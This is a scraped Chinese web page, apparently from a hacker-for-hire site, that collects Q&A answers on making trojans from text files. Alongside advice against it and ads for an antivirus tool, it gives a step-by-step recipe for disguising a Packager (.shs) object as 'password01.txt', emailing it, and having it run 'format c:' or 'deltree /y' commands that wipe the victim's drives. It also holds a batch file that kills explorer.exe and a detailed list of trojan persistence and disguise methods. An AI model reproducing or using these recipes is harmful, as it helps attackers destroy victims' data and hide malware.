当前位置:首页 > 黑客安全 > 正文内容

怎么用文本文档做木马病毒(如何下载木马病毒?如何使用?)

hacker2年前 (2022-07-12)黑客安全105

文章大纲:

怎么做木马

1, *** 木马和使用木马病毒都是违法犯罪的行为,不建议您去学习。

2, *** 出木马病毒程序后,这个程序就会自动开始执行,对您的电脑首先开始盗取帐号木马以及破坏程序。

3,所以如果自己受到了攻击或者盗号,不要用这种方式,要以正当途径来解决。

4,建议您到腾讯电脑管家官网下载一个电脑管家。

5,电脑管家拥有16层实时防护功能和 *** 帐号全景防御系统,可以从上网安全、应用入口、系统底层等全方位保护电脑安全不受木马病毒侵袭,而且电脑管家还可以全方位多维度保护账号安全,精确打击盗号木马,瞬时查杀并对风险预警。

怎么编木马病毒

下个VB来做个VBS关机脚本,调用CMD的关机命令就可以了,无毒无害,想知道怎样 *** 网上搜,我就不多说了。

系统的CMD里面有个计划关机命令然后以vbs脚本启动这个命令就行了....算了你还是百度HI我吧,我直接写源码给你,你下个VB回来,然后新建个VBS工程。将代码复制进去然后生成就行了,如果需要的话还可以外加注释给你

4楼说的不对,先不管他代码是否正确,大家想想要是直接文本就可以生成EXE文件那么还用编程做什么,你们说是不是,直接标准答案给我了。

嘻嘻

怎么编写木马

这个只是恶作剧程序,不是木马。

其实很简单嘛,只要终止explorer.exe进程就行了。

这都不需要编程,只要写个批处理就行。

把:taskkill

/f

/im

Explorer.exe写到一个文本文档里,然后把那个文档的后缀名由.txt改为.bat就行了。

病毒如何 *** 啊?

TXT *** [color=deeppink][/color]

1.创建一个只包含一个空格(

为了减小文件体积)的文本文件,任意取名。

2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板

文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后

点击“浏览”按钮选择要插入的文件。

3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹

出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令

:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示

出命令内容。

4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一

个图标。

5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名

称)。点击“文件”菜单中的“更新”,然后关闭此对话框。

6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默

认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面

上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作

为附件发出。

7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文

所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对

象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st

art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符

根据实际情况自定义);如果替换为:start.exe /m deltree /y

c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当

然大家可以改成其它的命令)

很简单,这样一个恶意的攻击程序被弄出来了!

怎么样 *** 木马?

*** 时代可不太平,谁没有遭遇过病毒或木马?从CIH、I Love You到红色代码、Nimda,从BO到冰河,无一不是网友经常懈逅的对象。怎么避免这些“艳遇”是广大用户孜孜以求的目标,不过,“道高一尺,魔高一丈”,“防”永远是落后的,主动消灭它们才是积极主动的。

要消灭它们,首先就要掌握病毒及木马是怎么入侵我们的"爱机"的。有关病毒及木马的入侵招数的文章很多,但都不太全面,编者偶然间发现了一篇作者不详,但内容颇为全面的文章,特意整理出来,希望对大家有所帮助。

一、修改批处理

很古老的 *** ,但仍有人使用。一般通过修改下列三个文件来作案:

Autoexec.bat(自动批处理,在引导系统时执行)

Winstart.bat(在启动GUI图形界面环境时执行)

Dosstart.bat(在进入MS-DOS方式时执行)

例如:编辑C:\\windows\\Dosstart.bat,加入:start Notepad,当你进入“MS-DOS方式”时,就可以看到记事本被启动了。

二、修改系统配置

常使用的 *** ,通过修改系统配置文件System.ini、Win.ini来达到自动运行的目的,涉及范围有:

在Win.ini文件中:

[windows]

load=程序名

run=程序名

在System.ini文件中:

[boot]

shell=Explorer.exe

其中修改System.ini中Shell值的情况要多一些,病毒木马通过修改这里使自己成为Shell,然后加载Explorer.exe,从而达到控制用户电脑的目的。

三、借助自动运行功能

这是黑客最新研发成果,之前该 *** 不过被发烧的朋友用来修改硬盘的图标而已,如今它被赋予了新的意义,黑客甚至声称这是Windows的新BUG。

Windows的自动运行功能确实很烂,早年许多朋友因为自动运行的光盘中带有CIH病毒而中招,现在不少软件可以方便地禁止光盘的自动运行,但硬盘呢?其实硬盘也支持自动运行,你可尝试在D盘根目录下新建一个Autorun.inf,用记事本打开它,输入如下内容:

[autorun]

open=Notepad.exe

保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事本打开了,而D盘却没有打开。

当然,以上只是一个简单的实例,黑客做得要精密很多,他们会把程序改名为“.exe”(不是空格,而是中文的全角空格,这样在Autorun.inf中只会看到“open=”而被忽略,此种行径在修改系统配置时也常使用,如“run=”;为了更好地隐藏自己,其程序运行后,还会替你打开硬盘,让你难以查觉。

由此可以推想,如果你打开了D盘的共享,黑客就可以将木马和一个Autorun.inf存入该分区,当Windows自动刷新时,你也就“中奖”了,因此,大家千万不要共享任何根目录,当然更不能共享系统分区(一般为C:)。

四、通过注册表中的Run来启动

很老套的 *** ,但80%的黑客仍在使用,通过在Run、RunOnce、RunOnceEx、RunServices、RunServicesOnce中添加键值,可以比较容易地实现程序的加载,黑客尤其方便在带”Once”的主键中作手脚,因此带“Once”的主键中的键值,在程序运行后将被删除,因此当用户使用注册表修改程序查看时,不会发现异样。另外,还有这样的程序:在启动时删除Run中的键值,而在退出时(或关闭系统时)又添加键值,达到隐蔽自己的目的。(这种 *** 的缺点是:害怕恶意关机或停电,呵呵!)

五、通过文件关联启动

很受黑客喜爱的方式,通过EXE文件的关联(主键为:exefile),让系统在执行任何程序之前都运行木马,真的好毒!通常修改的还有txtfile(文本文件的关联,谁不用用记事本呢?)、regfile(注册表文件关联,一般用来防止用户恢复注册表,例如让用户双击.reg文件就关闭计算机)、unkown(未知文件关联)。为了防止用户恢复注册表,用此法的黑客通常还连带谋杀scanreg.exe、sfc.exe、Extrac32.exe、regedit.exe等程序,阻碍用户修复。

六、通过API HOOK启动

这种 *** 较为高级,通过替换系统的DLL文件,让系统启动指定的程序。例如:拨号上网的用户必须使用Rasapi32.dll中的API函数来进行连接,那么黑客就会替换这个DLL,当用户的应用程序调用这个API函数,黑客的程序就会先启动,然后调用真正的函数完成这个功能(特别提示:木马可不一定是EXE,还可以是DLL、VXD),这样既方便又隐蔽(不上网时根本不运行)。中此绝毒的虫子,只有两种选择:Ghost或重装系统,幸好此毒廖廖无几,实属万虫之幸!

API的英文全称为:Application Programming Interface,也就是应用程序编程接口。在Windows程序设计领域发展初期,Windows程序员所能使用的编程工具唯有API函数,这些函数是Windows提供给应用程序与操作系统的接口,他们犹如“积木块”一样,可以搭建出各种界面丰富,功能灵活的应用程序。所以可以认为API函数是构筑整个Windows框架的基石,在它的下面是Windows的操作系统核心,而它的上面则是所有华丽的Windows应用程序。

七、通过VXD启动

此法也是高手专用版,通过把木马写成VXD形式加载,直接控制系统底层,极为罕见。它们一般在注册表[HKEY_ LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\VxD]主键中启动,很难发觉,解决 *** 更好也是用Ghost恢复或重新干净安装。

八、通过浏览网页启动

通过此种途径有两种 *** :

利用MIME漏洞:这是2001年黑客中更流行的手法,因为它简单有效,加上宽带网的流行,令用户防不胜防,想一想,仅仅是鼠标变一下“沙漏”,木马就安装妥当,Internet真是太“方便”了!不过今年有所减少,一方面许多人都改用IE6.0;另一方面,大部分个人主页空间都不允许上传.eml文件了。

MIME被称为多用途Internet邮件扩展(Multipurpose Internet Mail Extensions),是一种技术规范,原用于电子邮件,现在也可以用于浏览器。MIME对邮件系统的扩展是巨大的,在它出现前,邮件内容如果包含声音和动画,就必须把它变为ASCII码或把二进制的信息变成可以传送的编码标准,而接收方必须经过解码才可以获得声音和图画信息。MIME提供了一种可以在邮件中附加多种不同编码文件的 *** ,这与原来的邮件是大大不同的。而现在MIME已经成为了HTTP协议标准的一个部分。

九、利用Java applet

划时代的Java更高效、更方便——不过是悄悄地修改你的注册表,让你千百次地访问黄(黑)色网站,让你关不了机,让你……,还可以让你中木马。这种 *** 其实很简单,先利用HTML把木马下载到你的缓存中,然后修改注册表,指向其程序。

十、利用系统自动运行的程序

这一条主要利用用户的麻痹大意和系统的运行机制进行,命中率很高。在系统运行过程中,有许多程序是自动运行的,比如:磁盘空间满时,系统自动运行“磁盘清理”程序(cleanmgr.exe);启动资源管理器失败时,双击桌面将自动运行“任务管理器”程序(Taskman.exe);格式化磁盘完成后,系统将提示使用“磁盘扫描”程序(scandskw.exe);点击帮助或按F1时,系统将运行Winhelp.exe或Hh.exe打开帮助文件;启动时,系统将自动启动“系统栏”程序(SysTray.exe)、“输入法”程序(internat.exe)、“注册表检查” 程序(scanregw.exe)、“计划任务”程序(Mstask.exe)、“电源管理”程序等。

这为恶意程序提供了机会,通过覆盖这些文件,不必修改任何设置系统就会自动执行它们!而用户在检查注册表和系统配置时不会引起任何怀疑,例如“注册表检查” 程序的作用是启动时检查和备份注册表,正常情况不会有任何提示,那么它被覆盖后真可谓是“神不知、鬼不觉”。当然,这也许会被“系统文件检查器”检查(但勤快的人不多)出来。

黑客还有一高招“偷天换日”!不覆盖程序也可达到这个目的, *** 是:利用System目录比Windows目录优先的特点,以相同的文件名,将程序放到System目录中。你可以试试,将Notepad.exe(记事本)复制到System目录中,并改名为Regedit.exe(注册表编辑器),然后从“开始”→“运行”中,输入“Regedit”回车,你会发现运行的竟然是那个假冒的Notepad.exe!同样,如果黑客将程序放到System中,然后在运行时调用真正的Regedit,谁知道呢?(这种 *** 由于大部分目标程序不是经常被系统调用,因此常被黑客用来作为被删除后的恢复 *** ,如果某个东东被删除了又出现,不妨检查检查这些文件。)

十一、还有什么“高招”

黑客还常常使用名字欺骗技术和运行假象与之配合。名字欺骗技术如上述的全角空格主文件名“.exe”就是一例,另外常见的有在修改文件关联时,使用“ ”(ASCII值255,输入时先按下Alt键,然后在小键盘上输入255)作为文件名,当这个字符出现在注册表中时,人们往往很难发现它的存在。此外还有利用字符相似性的,如:“Systray.exe”和“5ystray”(5与大写S相似);长度相似性的,如:“Explorer.exe”和“Explore.exe”(后者比前者少一个字母,心理学实验证明,人的之一感觉只识别前四个字母,并对长度不敏感);运行假象则是指运行某些木马时,程序给出一个虚假的提示来欺骗用户。一个运行后什么都没有的程序,地球人都知道不是什么好东西;但对于一个提示“内存不足的程序,恐怕还在埋怨自己的内存太少哩!

怎么编辑木马病毒?(详细点)更好有教程!

您好:

建议您不要编辑或使用木马病毒,木马病毒会对您的电脑造成损害的,如果您曾使用过此类不安全的木马软件的话,为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载

腾讯电脑管家企业平台:

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时接单的网站发布,如需转载请注明出处。

本文链接:https://szlqgy.com/32963.html

“怎么用文本文档做木马病毒(如何下载木马病毒?如何使用?)” 的相关文章

耻骨是哪个部位(外阴骨头疼是怎么回事)

就是一救阴毛就会疼,你好,外阴骨头痛,耻骨是要逐渐分离的,很正常的啊。倒是耻骨疼,你说的这个部位应该是阴阜区,这种情况首、就是一救阴毛,我很纳闷。 80的原因是尿路感染剩下的20在女性孕妇中出现,谁知道能告诉我吗。但也不外乎血瘀。 耻骨疼是怎么回事、有没有这。需要关注一下。也不知道是为什么,你好,到...

匡威帆布鞋尺码(匡威帆布鞋码数怎么选择)

平常穿3买36码会不会小了,貌似听说匡威的帆。 我35的脚穿他家所谓35的鞋子其实就跟穿36一样。 所以匡威35码对应的中国尺码应该是38码.鉴于。 给你个参考吧我一般穿39的鞋匡威的话35稍宽松37长度正好但略挤,正版匡威鞋码偏大。匡威的鞋码一般比国内的鞋码大半码。 40的,是41码,鞋偏窄,如果...

谷雨过后再无寒(赞美谷雨的诗句)

宋林和靖尝茶次寄越僧灵皎白云峰下两枪新,江国多寒农事晚。清郑板桥七言诗不风不雨正晴和,千回来绕百回看。梨花开谢杏花残,寄包。朱有炖元宫词,诗词。莺为使,石渚收机巧。 无来又隔年,越禽牢闭口。清和易晚天,白发卢郎情未已。明,春逢谷雨晴。愿与松色,谢中上人寄茶唐·齐己春山谷雨前。天点纷林际。 最爱晚凉佳...

鼻子干燥怎么办(鼻子长包怎么办)

每次敷药前,从饮食下手吧吃清凉去火的食物。注意皮肤清洁。可以少用些硫磺皂洗洗。 一摸就痛、建议。一碰会有点疼。对于你鼻上长的痘痘,长痘痘大部分是由于内调、多喝水喝茶、建议你在这段时间一定要注意颜面部的清洁卫生。因此。忌吃油腻的东西,发炎了。 酒类等辛热刺激物。鼻头附近的毛孔不畅通,实在不行就去看医生...

黑苹果安装教程(黑苹果为什么烧主板)

我的是台式机实在没法就把独立显卡拔了用集成的了不知道你的笔记本是双显卡吗按照教程修改一,因为黑苹果有时候的驱动很难找,技嘉板的构造规格和苹果接近,像安装win7那样啊。 只要是双核以上就可以,问题应该出现在苹果系统本身。 黑苹果需要主板,但不会像安装win7那样。如果有自检画面就说明电脑本身没问题。...

打泡泡小游戏(天天玩泡泡的游戏)

看谁长得最高—双脚原地地向上跳,看到房间名为飞碟的爬”诸如此类的房间,进行做吹泡泡的游戏教师吹泡泡,小霸王游戏有一款吹泡泡游戏叫什么名字、画质的精细度还是色彩的丰富度上都是一流的。 连按左右或者上下使角色有来回走的动作,我认为超好玩。常用于乱V无限V的抖泡泡。 我安装呢泡泡游戏,泡泡龙3泡泡龙泡泡娃...

评论列表

访客
2年前 (2022-07-12)

程序被弄出来了!怎么样制作木马?网络时代可不太平,谁没有遭遇过病毒或木马?从CIH、I Love You到红色代码、Nimda,从BO到冰河,无一不是网友经常懈逅的对象。怎么避免这些“艳遇”是广大用户孜孜以求的目标,不过,“道高一尺,魔高一丈”,“防”永远是落后的,主动消灭它们才是积极主

访客
2年前 (2022-07-12)

下内容: [autorun] open=Notepad.exe 保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事本打开了,而D盘却没有打开。 当然,以上

访客
2年前 (2022-07-12)

文章大纲:1、怎么做木马2、怎么编木马病毒3、怎么编写木马4、病毒如何制作啊?5、怎么样制作木马?6、怎么编辑木马病毒?(详细点)最好有教程!怎么做木马1,制作木马和使用木马病毒都是违法犯罪的行为,不建议您去学习。2,制作出木马病毒程序后,这个程序就会自动开始执行,对您的电脑首先开始盗取帐号木

访客
2年前 (2022-07-12)

。在系统运行过程中,有许多程序是自动运行的,比如:磁盘空间满时,系统自动运行“磁盘清理”程序(cleanmgr.exe);启动资源管理器失败时,双击桌面将自动运行“任务管理器”程序(Taskman.exe);格式化磁

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。